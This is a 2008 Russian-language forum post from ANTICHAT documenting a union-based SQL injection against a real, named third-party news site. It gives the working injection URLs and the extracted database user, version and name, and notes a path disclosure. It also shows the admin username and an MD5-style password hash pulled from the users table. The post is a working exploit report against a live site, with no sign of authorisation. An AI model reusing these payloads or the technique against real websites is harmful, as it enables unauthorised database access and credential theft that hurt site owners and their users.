ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
29.08.2008, 16:39
|
|
Познающий
Регистрация: 30.10.2007
Сообщений: 63
Провел на форуме:
299216
Репутация:
59
|
|
Код:
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),%20database()),10/*
olympicwatch_org_db@localhost:4.0.22:olympicwatch_org_db
+ раскрытие пути Warning: getimagesize(): Unable to access ./img/img_php/1_obrazek1.8 in /domains3/olympicwatch-org/ftp/www_root/news.php on line 67
+ есть таблица users
http://www.olympicwatch.org/news.php?id=-1'+union+select+1,2,3,id,5,6,7,8,user,10+from+user s/*
1
olympicwatch-admin
Точно названия поля с хэшем подобрать не получилось, пришлось выдирать через хитрую задницу
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1,2,3,4,5,6,7+from+users/*
затем, хитрый join три раза, поскольку поля лежали в не выводимых областях
http://www.olympicwatch.org/news.php?id=-1'+union+select+*,1+from+users+join+users+u+join+u sers+b/*
Хэш:f0b16007c9541482261c66376e8eaf03
Подобрать не удалось, точный алгоритм не установлен. С учётом того, что в users три поля, соли там (скорее всего) нет.
Ничего особо интересного найти не удалось.  |
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Древовидный вид